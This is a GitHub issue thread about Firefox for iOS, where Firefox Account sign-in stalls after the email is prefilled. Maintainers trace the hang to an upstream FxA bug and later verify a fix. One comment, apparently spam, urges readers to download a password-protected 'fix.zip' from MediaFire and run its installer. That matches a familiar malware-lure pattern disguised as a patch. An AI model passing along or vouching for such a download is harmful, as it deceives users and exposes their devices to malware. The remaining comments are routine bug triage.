### ISSUE TITLE
The login process get stuck if the email address was filled in automatically

### ISSUE THREAD

**Issue by alinamoldovan84** [mozilla-mobile/firefox-ios#21618]
## Steps to reproduce
1. Login with an FxA account 
1. Navigate to the FxA account and choose to disconnect  => The account is disconnected 
1. Navigate to the hamburger menu, choose Sync and save data 
1. Choose the "Use email instead" option => email is prefilled and the user is asked to enter the password 
1. Enter the password and Sign In 

### Expected behavior
The user is successfully logged in. 

### Actual behavior
The login process gets stuck

### Device & build information
* Device: iPhone 15+ (18.0), iPhone 14+(16.0.2),  iPhone 15 (17.5)  
* Build version: 129.2 (44469); 130 (44542)
* First seen version: ? 
### Notes
* Workaround: User must choose "Use a different account" option to be able to log into the app.
### Attachments: 

https://github.com/user-attachments/assets/168f1430-618c-4260-8327-044a5e492694

┆Issue is synchronized with this [Jira Task](https://mozilla-hub.atlassian.net/browse/FXIOS-9847)

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nbhasin2** [comment]
This seems like an FxA issue so a discussion is in place

**Comment by data-sync-user** [comment]
➤ Nishant Bhasin commented:

This seems to have been fixed here 

https://mozilla-hub.atlassian.net/browse/FXA-10316 ( https://mozilla-hub.atlassian.net/browse/FXA-10316|smart-link ) 

So on Nightly, Beta and on Prod it should be fixed. 

Worth checking!

**Comment by data-sync-user** [comment]
➤ Andrei Bodea commented:

Verified as fixed on v132 (45864) with iPhone 15 Pro (17.5).
